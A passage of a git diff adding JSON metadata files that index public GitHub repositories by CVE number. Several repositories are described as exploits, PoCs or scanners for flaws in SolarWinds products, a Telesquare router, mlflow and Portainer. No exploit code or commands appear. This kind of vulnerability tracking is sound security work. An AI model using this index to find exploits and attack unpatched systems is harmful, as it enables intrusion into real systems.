"public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 865494019, + "name": "CVE-2024-28987", + "full_name": "PlayerFridei\/CVE-2024-28987", + "owner": { + "login": "PlayerFridei", + "id": 55279232, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55279232?v=4", + "html_url": "https:\/\/github.com\/PlayerFridei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PlayerFridei\/CVE-2024-28987", + "description": "CVE-2024-28987 Scanner & Exploiter - SolarWinds Web Help Desk", + "fork": false, + "created_at": "2024-09-30T16:12:14Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-02T20:28:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889030458, + "name": "CVE-2024-28987", + "full_name": "expl0itsecurity\/CVE-2024-28987", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-28987", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:27:46Z", + "updated_at": "2024-11-19T19:03:13Z", + "pushed_at": "2024-11-15T13:31:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28995.json b/2024/CVE-2024-28995.json new file mode 100644 index 0000000000..cc1c3ac26f --- /dev/null +++ b/2024/CVE-2024-28995.json @@ -0,0 +1,290 @@ +[ + { + "id": 814960106, + "name": "CVE-2024-28995", + "full_name": "krypton-kry\/CVE-2024-28995", + "owner": { + "login": "krypton-kry", + "id": 66370436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66370436?v=4", + "html_url": "https:\/\/github.com\/krypton-kry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krypton-kry\/CVE-2024-28995", + "description": "CVE-2024-28995 PoC", + "fork": false, + "created_at": "2024-06-14T04:06:58Z", + "updated_at": "2024-06-30T06:24:58Z", + "pushed_at": "2024-06-14T04:07:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815032884, + "name": "CVE-2024-28995", + "full_name": "ggfzx\/CVE-2024-28995", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-28995", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:56:03Z", + "updated_at": "2024-06-21T07:13:08Z", + "pushed_at": "2024-06-14T07:58:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815034714, + "name": "CVE-2024-28995-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-28995-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-28995-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-14T08:01:13Z", + "updated_at": "2024-06-14T08:01:19Z", + "pushed_at": "2024-06-14T08:01:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815035984, + "name": "CVE-2024-28995", + "full_name": "0xc4t\/CVE-2024-28995", + "owner": { + "login": "0xc4t", + "id": 105418279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4", + "html_url": "https:\/\/github.com\/0xc4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc4t\/CVE-2024-28995", + "description": "Exploit for CVE-2024-28995", + "fork": false, + "created_at": "2024-06-14T08:04:48Z", + "updated_at": "2024-07-24T08:32:09Z", + "pushed_at": "2024-06-14T08:08:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815346726, + "name": "CVE-2024-28995", + "full_name": "bigb0x\/CVE-2024-28995", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-28995", + "description": "CVE-2024-28995 POC Vulnerability Scanner", + "fork": false, + "created_at": "2024-06-14T23:05:40Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T12:21:28Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816000240, + "name": "CVE-2024-28995", + "full_name": "muhammetali20\/CVE-2024-28995", + "owner": { + "login": "muhammetali20", + "id": 11004443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11004443?v=4", + "html_url": "https:\/\/github.com\/muhammetali20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammetali20\/CVE-2024-28995", + "description": "SolarWinds Serv-U Directory Traversal Vulnerability (CVE-2024-28995) POC", + "fork": false, + "created_at": "2024-06-16T19:24:15Z", + "updated_at": "2024-06-16T19:24:15Z", + "pushed_at": "2024-06-14T09:51:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 820377551, + "name": "CVE-2024-28995-SolarWinds-Serv-U", + "full_name": "Praison001\/CVE-2024-28995-SolarWinds-Serv-U", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-28995-SolarWinds-Serv-U", + "description": "Exploit for CVE-2024-28995 affecting SolarWinds Serv-U 15.4.2 HF 1 and previous versions", + "fork": false, + "created_at": "2024-06-26T10:51:50Z", + "updated_at": "2024-11-20T16:30:52Z", + "pushed_at": "2024-06-26T11:54:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822568244, + "name": "CVE-2024-28995", + "full_name": "Stuub\/CVE-2024-28995", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-28995", + "description": "CVE-2024-28955 Exploitation PoC ", + "fork": false, + "created_at": "2024-07-01T11:49:51Z", + "updated_at": "2024-09-12T08:51:31Z", + "pushed_at": "2024-07-01T12:53:21Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024", + "cve-2024-28995", + "exploit", + "nist", + "owasp", + "poc", + "solarwinds" + ], + "visibility": "public", + "forks": 5, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847037561, + "name": "CVE-2024-28995", + "full_name": "gotr00t0day\/CVE-2024-28995", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-28995", + "description": "SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. ", + "fork": false, + "created_at": "2024-08-24T17:05:48Z", + "updated_at": "2024-10-24T16:54:42Z", + "pushed_at": "2024-08-24T17:22:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28999.json b/2024/CVE-2024-28999.json new file mode 100644 index 0000000000..23cc9c726f --- /dev/null +++ b/2024/CVE-2024-28999.json @@ -0,0 +1,33 @@ +[ + { + "id": 818662371, + "name": "CVE-2024-28999", + "full_name": "HussainFathy\/CVE-2024-28999", + "owner": { + "login": "HussainFathy", + "id": 76268960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4", + "html_url": "https:\/\/github.com\/HussainFathy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-28999", + "description": "Exploit for CVE-2024-28999 SolarWinds Platform Race Condition Vulnerability - login page", + "fork": false, + "created_at": "2024-06-22T13:39:56Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-22T17:28:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29050.json b/2024/CVE-2024-29050.json new file mode 100644 index 0000000000..ca46cc49af --- /dev/null +++ b/2024/CVE-2024-29050.json @@ -0,0 +1,33 @@ +[ + { + "id": 867522608, + "name": "CVE-2024-29050", + "full_name": "Akrachli\/CVE-2024-29050", + "owner": { + "login": "Akrachli", + "id": 75633934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75633934?v=4", + "html_url": "https:\/\/github.com\/Akrachli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akrachli\/CVE-2024-29050", + "description": "CVE-2024-29050 is a vulnerability found in the Windows Cryptographic Services.", + "fork": false, + "created_at": "2024-10-04T08:19:11Z", + "updated_at": "2024-10-07T14:07:37Z", + "pushed_at": "2024-10-04T08:24:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29059.json b/2024/CVE-2024-29059.json new file mode 100644 index 0000000000..c01282dc8a --- /dev/null +++ b/2024/CVE-2024-29059.json @@ -0,0 +1,33 @@ +[ + { + "id": 770302104, + "name": "HttpRemotingObjRefLeak", + "full_name": "codewhitesec\/HttpRemotingObjRefLeak", + "owner": { + "login": "codewhitesec", + "id": 8680262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8680262?v=4", + "html_url": "https:\/\/github.com\/codewhitesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codewhitesec\/HttpRemotingObjRefLeak", + "description": "Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)", + "fork": false, + "created_at": "2024-03-11T10:14:39Z", + "updated_at": "2024-11-15T17:13:47Z", + "pushed_at": "2024-03-25T12:56:16Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 86, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29269.json b/2024/CVE-2024-29269.json new file mode 100644 index 0000000000..b83f291adb --- /dev/null +++ b/2024/CVE-2024-29269.json @@ -0,0 +1,239 @@ +[ + { + "id": 781235641, + "name": "CVE-2024-29269", + "full_name": "wutalent\/CVE-2024-29269", + "owner": { + "login": "wutalent", + "id": 83970507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83970507?v=4", + "html_url": "https:\/\/github.com\/wutalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wutalent\/CVE-2024-29269", + "description": "CVE-2024-29269", + "fork": false, + "created_at": "2024-04-03T02:02:27Z", + "updated_at": "2024-06-07T15:48:55Z", + "pushed_at": "2024-04-03T02:19:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785588692, + "name": "CVE-2024-29269", + "full_name": "YongYe-Security\/CVE-2024-29269", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-29269", + "description": "Telesquare TLR-2005KSH_RCE (CVE-2024-29269) Batch scan\/exploit", + "fork": false, + "created_at": "2024-04-12T07:36:08Z", + "updated_at": "2024-11-06T23:16:30Z", + "pushed_at": "2024-04-12T07:58:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802976156, + "name": "CVE-2024-29269", + "full_name": "Chocapikk\/CVE-2024-29269", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-29269", + "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.", + "fork": false, + "created_at": "2024-05-19T19:05:00Z", + "updated_at": "2024-11-02T04:36:19Z", + "pushed_at": "2024-05-19T19:12:32Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812434204, + "name": "CVE-2024-29269", + "full_name": "dream434\/CVE-2024-29269", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-29269", + "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.", + "fork": false, + "created_at": "2024-06-08T22:06:33Z", + "updated_at": "2024-10-09T13:46:14Z", + "pushed_at": "2024-10-09T13:46:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822837368, + "name": "CVE-2024-29269-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-29269-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-29269-EXPLOIT", + "description": "A PoC exploit for CVE-2024-29269 - Telesquare TLR-2005KSH Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-07-01T23:49:59Z", + "updated_at": "2024-11-26T16:10:08Z", + "pushed_at": "2024-07-02T00:00:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugs", + "critical", + "cve-2024-29269", + "devices", + "exploit", + "exploitation", + "exploits", + "iot", + "poc", + "proof-of-concept", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "router", + "telesquare", + "tlr-2005ksh", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854044213, + "name": "CVE-2024-29269-RCE", + "full_name": "hack-with-rohit\/CVE-2024-29269-RCE", + "owner": { + "login": "hack-with-rohit", + "id": 162045216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162045216?v=4", + "html_url": "https:\/\/github.com\/hack-with-rohit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hack-with-rohit\/CVE-2024-29269-RCE", + "description": null, + "fork": false, + "created_at": "2024-09-08T08:56:33Z", + "updated_at": "2024-10-18T22:56:35Z", + "pushed_at": "2024-09-08T09:24:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864624119, + "name": "CVE-2024-29269", + "full_name": "Quantum-Hacker\/CVE-2024-29269", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-29269", + "description": null, + "fork": false, + "created_at": "2024-09-28T18:01:30Z", + "updated_at": "2024-09-28T18:22:23Z", + "pushed_at": "2024-09-28T18:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29272.json b/2024/CVE-2024-29272.json new file mode 100644 index 0000000000..18658d6e8b --- /dev/null +++ b/2024/CVE-2024-29272.json @@ -0,0 +1,33 @@ +[ + { + "id": 777466221, + "name": "CVE-2024-29272", + "full_name": "awjkjflkwlekfdjs\/CVE-2024-29272", + "owner": { + "login": "awjkjflkwlekfdjs", + "id": 164954340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164954340?v=4", + "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs\/CVE-2024-29272", + "description": null, + "fork": false, + "created_at": "2024-03-25T22:43:42Z", + "updated_at": "2024-03-25T22:44:59Z", + "pushed_at": "2024-03-26T06:59:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29275.json b/2024/CVE-2024-29275.json new file mode 100644 index 0000000000..76f109a0eb --- /dev/null +++ b/2024/CVE-2024-29275.json @@ -0,0 +1,33 @@ +[ + { + "id": 817879551, + "name": "nuclei_template", + "full_name": "Cyphercoda\/nuclei_template", + "owner": { + "login": "Cyphercoda", + "id": 27870649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27870649?v=4", + "html_url": "https:\/\/github.com\/Cyphercoda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyphercoda\/nuclei_template", + "description": "CVE-2024-29275.yaml", + "fork": false, + "created_at": "2024-06-20T16:19:30Z", + "updated_at": "2024-07-28T07:14:30Z", + "pushed_at": "2024-06-20T17:25:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29278.json b/2024/CVE-2024-29278.json new file mode 100644 index 0000000000..85475539b5 --- /dev/null +++ b/2024/CVE-2024-29278.json @@ -0,0 +1,33 @@ +[ + { + "id": 779182155, + "name": "cve", + "full_name": "QDming\/cve", + "owner": { + "login": "QDming", + "id": 109197048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109197048?v=4", + "html_url": "https:\/\/github.com\/QDming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QDming\/cve", + "description": "Use CVE-2024-29278", + "fork": false, + "created_at": "2024-03-29T08:20:23Z", + "updated_at": "2024-03-29T08:20:23Z", + "pushed_at": "2024-03-29T08:51:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2928.json b/2024/CVE-2024-2928.json new file mode 100644 index 0000000000..05c08ea526 --- /dev/null +++ b/2024/CVE-2024-2928.json @@ -0,0 +1,33 @@ +[ + { + "id": 885154667, + "name": "CVE-2024-2928", + "full_name": "nuridincersaygili\/CVE-2024-2928", + "owner": { + "login": "nuridincersaygili", + "id": 45103481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45103481?v=4", + "html_url": "https:\/\/github.com\/nuridincersaygili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuridincersaygili\/CVE-2024-2928", + "description": "Arbitrary file read exploit for CVE-2024-2928 in mlflow ", + "fork": false, + "created_at": "2024-11-08T03:55:08Z", + "updated_at": "2024-11-20T12:08:00Z", + "pushed_at": "2024-11-08T04:11:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29296.json b/2024/CVE-2024-29296.json new file mode 100644 index 0000000000..5241bb2c08 --- /dev/null +++ b/2024/CVE-2024-29296.json @@ -0,0 +1,68 @@ +[ + { + "id": 784425919, + "name": "CVE-2024-29296", + "full_name": "ThaySolis\/CVE-2024-29296", + "owner": { + "login": "ThaySolis", + "id": 75222240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75222240?v=4", + "html_url": "https:\/\/github.com\/ThaySolis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThaySolis\/CVE-2024-29296", + "description": "CVE-2024-29296 - User enumeration on Portainer CE - 2.19.4", + "fork": false, + "created_at": "2024-04-09T20:36:03Z", + "updated_at": "2024-05-07T11:48:13Z", + "pushed_at": "2024-04-11T13:53:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793734104, + "name": "CVE-2024-29296-PoC", + "full_name": "Lavender-exe\/CVE-2024-29296-PoC", + "owner": { + "login": "Lavender-exe", + "id": 32195948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32195948?v=4", + "html_url": "https:\/\/github.com\/Lavender-exe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lavender-exe\/CVE-2024-29296-PoC", + "description": "User Enumeration through response time difference", + "fork": false, + "created_at": "2024-04-29T19:09:41Z", + "updated_at": "2024-04-29T23:58:37Z", + "pushed_at": "2024-04-29T19:12:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "enumeration", + "portainer" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29375.json b/2024/CVE-2024-29375.json new file mode 100644 index 0000000000..b85244e6f8 --- /dev/null +++ b/2024/CVE-2024-29375.json @@ -0,0 +1,33 @@ +[ + { + "id": 770488543, + "name": "CVE-2024-29375", + "full_name": "ismailcemunver\/CVE-2024-29375", + "owner": { + "login": "ismailcemunver", + "id": 154702425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154702425?v=4", + "html_url": "https:\/\/github.com\/ismailcemunver", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ismailcemunver\/CVE-2024-29375", + "description": "CSV Injection in Addactis IBNRS 3.10.3.107", + "fork": false, + "created_at": "2024-03-11T16:32:41Z", + "updated_at": "2024-03-30T12:45:25Z", + "pushed_at": "2024-04-03T06:56:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29399.json b/2024/CVE-2024-29399.json new file mode 100644 index 0000000000..f46b927bcf --- /dev/null +++ b/2024/CVE-2024-29399.json @@ -0,0 +1,33 @@ +[ + { + "id": 783958528, + "name": "CVE-2024-29399", + "full_name": "ally-petitt\/CVE-2024-29399", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-29399", + "description": "CVE-2024-29399 reference", + "fork": false, + "created_at": "2024-04-08T23:03:04Z", + "updated_at": "2024-04-10T04:07:47Z", + "pushed_at": "2024-04-08T23:18:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29404.json b/2024/CVE-2024-29404.json new file mode 100644 index 0000000000..0be8aaad35 --- /dev/null +++ b/2024/CVE-2024-29404.json @@ -0,0 +1,33 @@ +[ + { + "id": 893452720, + "name": "CVE-2024-29404_Razer", + "full_name": "mansk1es\/CVE-2024-29404_Razer", + "owner": { + "login": "mansk1es", + "id": 74832816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4", + "html_url": "https:\/\/github.com\/mansk1es", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansk1es\/CVE-2024-29404_Razer", + "description": null, + "fork": false, + "created_at": "2024-11-24T13:43:36Z", + "updated_at": "2024-11-27T12:03:02Z", + "pushed_at": "2024-11-27T12:02:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29415.json b/2024/CVE-2024-29415.json new file mode 100644 index 0000000000..c9276ad194 --- /dev/null +++ b/2024/CVE-2024-29415.json @@ -0,0 +1,33 @@ +[ + { + "id": 824470499, + "name": "node-ip-vex", + "full_name": "felipecruz91\/node-ip-vex", + "owner": { + "login": "felipecruz91", + "id": 15997951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15997951?v=4", + "html_url": 